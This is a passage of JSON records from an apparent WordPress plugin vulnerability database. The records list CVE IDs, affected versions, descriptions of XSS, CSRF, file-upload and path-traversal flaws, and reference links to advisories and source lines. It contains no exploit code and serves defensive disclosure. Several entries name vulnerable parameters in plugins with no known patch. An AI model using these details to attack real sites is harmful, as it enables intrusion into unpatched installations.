page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e8911a3-ce0f-420c-bf2a-1c2929d01cef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e8911a3-ce0f-420c-bf2a-1c2929d01cef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/includes\\\/rest-api\\\/v1\\\/rest-api.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/includes\\\/rest-api\\\/v1\\\/rest-api.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/mobile.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/mobile.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3016126%40post-smtp%2Ftrunk&old=3012318%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3016126%40post-smtp%2Ftrunk&old=3012318%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22150","slug":"portfolio-elementor","versionImpact":"3.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PWR Plugins Portfolio & Image Gallery for WordPress | PowerFolio allows Stored XSS. This issue affects Portfolio & Image Gallery for WordPress | PowerFolio: from n\/a through 3.1.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/portfolio-elementor\\\/wordpress-powerfolio-plugin-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/portfolio-elementor\\\/wordpress-powerfolio-plugin-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1129","slug":"nex-forms-express-wp-form-builder","versionImpact":"8.5.6","description":"The NEX-Forms \u2013 Ultimate Form Builder \u2013 Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the set_starred() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to mark records as starred.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53db0f72-3353-42bb-ad75-4c5aa32d7939?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53db0f72-3353-42bb-ad75-4c5aa32d7939?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0848","slug":"aa-calculator","versionImpact":"1.0","description":"The AA Cash Calculator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018invoice\u2019 parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/933ea8a2-3d1d-43a3-bb14-52f37576c9e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/933ea8a2-3d1d-43a3-bb14-52f37576c9e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aa-calculator\\\/trunk\\\/aacalculation.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aa-calculator\\\/trunk\\\/aacalculation.php#L79\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5645","slug":"envo-extra","versionImpact":"1.8.23","description":"The Envo Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018button_css_id\u2019 parameter within the Button widget in all versions up to, and including, 1.8.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbe53b09-84c6-4fb6-9a79-1e4987678129?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbe53b09-84c6-4fb6-9a79-1e4987678129?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/tags\\\/1.8.22\\\/lib\\\/elementor\\\/widgets\\\/button\\\/button.php#L676\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/tags\\\/1.8.22\\\/lib\\\/elementor\\\/widgets\\\/button\\\/button.php#L676\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/envo-extra\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/envo-extra\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098500\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098500\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5199","slug":"spotify-play-button","versionImpact":"1.0","description":"The Spotify Play Button WordPress plugin through 1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2cb8d7d-6d7c-42e9-b3db-cb3959bfd41b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2cb8d7d-6d7c-42e9-b3db-cb3959bfd41b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6705","slug":"reglevel","versionImpact":"1.2.1","description":"The RegLevel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6ead872-76a7-49c3-af07-d87a4c68183f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6ead872-76a7-49c3-af07-d87a4c68183f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reglevel\\\/trunk\\\/includes\\\/admin.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reglevel\\\/trunk\\\/includes\\\/admin.php#L73\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reglevel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reglevel\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reglevel\\\/trunk\\\/includes\\\/functions.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reglevel\\\/trunk\\\/includes\\\/functions.php#L11\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6019","slug":"music-request-manager","versionImpact":"1.3","description":"The Music Request Manager WordPress plugin through 1.3 does not sanitise and escape incoming music requests, which could allow unauthenticated users to perform Cross-Site Scripting attacks against administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5899c5c9-a550-4c86-a41d-7fcc1e84a7d3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5899c5c9-a550-4c86-a41d-7fcc1e84a7d3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9932","slug":"wux-blog-editor","versionImpact":"3.0.0","description":"The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'wuxbt_insertImageNew' function in versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2c0ab2d-1ba9-4a0a-b1fa-bacebe1034eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2c0ab2d-1ba9-4a0a-b1fa-bacebe1034eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wux-blog-editor\\\/tags\\\/3.0.0\\\/External_Post_Editor.php#L675\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wux-blog-editor\\\/tags\\\/3.0.0\\\/External_Post_Editor.php#L675\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-52376","slug":"boat-rental-system","versionImpact":"1.0.1","description":"Unrestricted Upload of File with Dangerous Type vulnerability in cmsMinds Boat Rental Plugin for WordPress allows Upload a Web Shell to a Web Server. This issue affects Boat Rental Plugin for WordPress: from n\/a through 1.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/boat-rental-system\\\/wordpress-boat-rental-plugin-for-wordpress-plugin-1-0-1-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/boat-rental-system\\\/wordpress-boat-rental-plugin-for-wordpress-plugin-1-0-1-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12256","slug":"simple-video-management-system","versionImpact":"1.0.4","description":"The Simple Video Management System plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'analytics_video' parameter in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-video-management-system\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-video-management-system\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdaa6b7c-bf38-44b5-9d83-2918cbedc683?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdaa6b7c-bf38-44b5-9d83-2918cbedc683?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13218","slug":"fast-tube","versionImpact":"2.3.1","description":"The Fast Tube WordPress plugin through 2.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79eb9432-3e3c-4a23-88a8-05aa3146061c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79eb9432-3e3c-4a23-88a8-05aa3146061c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0990","slug":"gloria-assistant-by-webtronic-labs","versionImpact":"1.1.4","description":"The I Am Gloria plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.4. This is due to missing or incorrect nonce validation on the iamgloria23_gloria_settings_page function. This makes it possible for unauthenticated attackers to reset the tenant ID via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gloria-assistant-by-webtronic-labs\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gloria-assistant-by-webtronic-labs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33fd44dc-b4f8-4429-8dcd-5161602bb318?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33fd44dc-b4f8-4429-8dcd-5161602bb318?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13690","slug":"wp-church-donation","versionImpact":"1.7","description":"The WP Church Donation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several donation form submission parameters in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/wp-church-donation\\\/tags\\\/1.7\\\/includes\\\/church-donation-form-display.php\",\"name\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/wp-church-donation\\\/tags\\\/1.7\\\/includes\\\/church-donation-form-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/wp-church-donation\\\/tags\\\/1.7\\\/includes\\\/church-donation-listings.php\",\"name\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/wp-church-donation\\\/tags\\\/1.7\\\/includes\\\/church-donation-listings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-church-donation\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-church-donation\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de8ac20f-d6ae-4e55-9337-4fb5ebd4f24a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de8ac20f-d6ae-4e55-9337-4fb5ebd4f24a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8398","slug":"simple-nav-archives","versionImpact":"2.1.3","description":"The Simple Nav Archives WordPress plugin through 2.1.3 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f432901f-31dd-433c-91bf-ec19fa61b6d8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f432901f-31dd-433c-91bf-ec19fa61b6d8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5235","slug":"opensheetmusicdisplay","versionImpact":"1.4.0","description":"The OpenSheetMusicDisplay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018className\u2019 parameter in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/opensheetmusicdisplay\\\/opensheetmusicdisplay\\\/blob\\\/develop\\\/CHANGELOG.md\",\"name\":\"https:\\\/\\\/github.com\\\/opensheetmusicdisplay\\\/opensheetmusicdisplay\\\/blob\\\/develop\\\/CHANGELOG.md\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opensheetmusicdisplay\\\/trunk\\\/opensheetmusicdisplay.php#L473\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opensheetmusicdisplay\\\/trunk\\\/opensheetmusicdisplay.php#L473\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301757\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301757\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301757\\\/#file48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301757\\\/#file48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opensheetmusicdisplay\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opensheetmusicdisplay\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a45417ce-d5dd-4706-adbb-d44670de6eb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a45417ce-d5dd-4706-adbb-d44670de6eb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2330","slug":"widgetkit-for-elementor","versionImpact":"2.5.4","description":"The All-in-One Addons for Elementor \u2013 WidgetKit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button+modal' widget in all versions up to, and including, 2.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widgetkit-for-elementor\\\/trunk\\\/elements\\\/button-modal\\\/template\\\/view.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widgetkit-for-elementor\\\/trunk\\\/elements\\\/button-modal\\\/template\\\/view.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283765\\\/widgetkit-for-elementor\\\/tags\\\/2.5.5\\\/elements\\\/button-modal\\\/template\\\/view.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283765\\\/widgetkit-for-elementor\\\/tags\\\/2.5.5\\\/elements\\\/button-modal\\\/template\\\/view.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/widgetkit-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/widgetkit-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83d5337b-8c06-41ee-b18c-2c39150a7f30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83d5337b-8c06-41ee-b18c-2c39150a7f30?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6629","slug":"post-smtp","versionImpact":"2.8.6","description":"The POST SMTP Mailer \u2013 Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018msg\u2019 parameter in all versions up to, and including, 2.8.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7681f984-d488-4da7-afe1-988e5ad012f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7681f984-d488-4da7-afe1-988e5ad012f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Wizard\\\/NewWizard.php#L396\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Wizard\\\/NewWizard.php#L396\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012318%40post-smtp%2Ftrunk&old=3006604%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012318%40post-smtp%2Ftrunk&old=3006604%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1128","slug":"tutor","versionImpact":"2.6.0","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 2.6.0. This is due to insufficient sanitization of HTML input in the Q&A functionality. This makes it possible for authenticated attackers, with Student access and above, to inject arbitrary HTML onto a site, though it does not allow Cross-Site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22420c2d-788c-4577-ae54-7b48f6063f5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22420c2d-788c-4577-ae54-7b48f6063f5d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037911\\\/tutor\\\/tags\\\/2.6.1\\\/classes\\\/Q_and_A.php?old=2827221&old_path=tutor\\\/trunk\\\/classes\\\/Q_and_A.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037911\\\/tutor\\\/tags\\\/2.6.1\\\/classes\\\/Q_and_A.php?old=2827221&old_path=tutor\\\/trunk\\\/classes\\\/Q_and_A.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0847","slug":"5280-bootstrap-modal-contact-form","versionImpact":"1.0","description":"The 5280 Bootstrap Modal Contact Form plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation in class-sbmm-list-table.php. This makes it possible for unauthenticated attackers to bulk delete messages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18464483-1d2f-4a4e-a1cc-6c1ddcc2dcf5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18464483-1d2f-4a4e-a1cc-6c1ddcc2dcf5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/5280-bootstrap-modal-contact-form\\\/trunk\\\/inc\\\/class-sbmm-list-table.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/5280-bootstrap-modal-contact-form\\\/trunk\\\/inc\\\/class-sbmm-list-table.php#L142\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5481","slug":"photo-gallery","versionImpact":"1.8.23","description":"The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.8.23 via the esc_dir function. This makes it possible for authenticated attackers to cut and paste (copy) the contents of arbitrary files on the server, which can contain sensitive information, and to cut (delete) arbitrary directories, including the root WordPress directory. By default this can be exploited by administrators only. In the premium version of the plugin, administrators can give gallery edit permissions to lower level users, which might make this exploitable by users as low as contributors.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c38826-4d49-4204-b6b6-b01d01373fa9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c38826-4d49-4204-b6b6-b01d01373fa9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L178\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L436\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L436\",\"refsource\"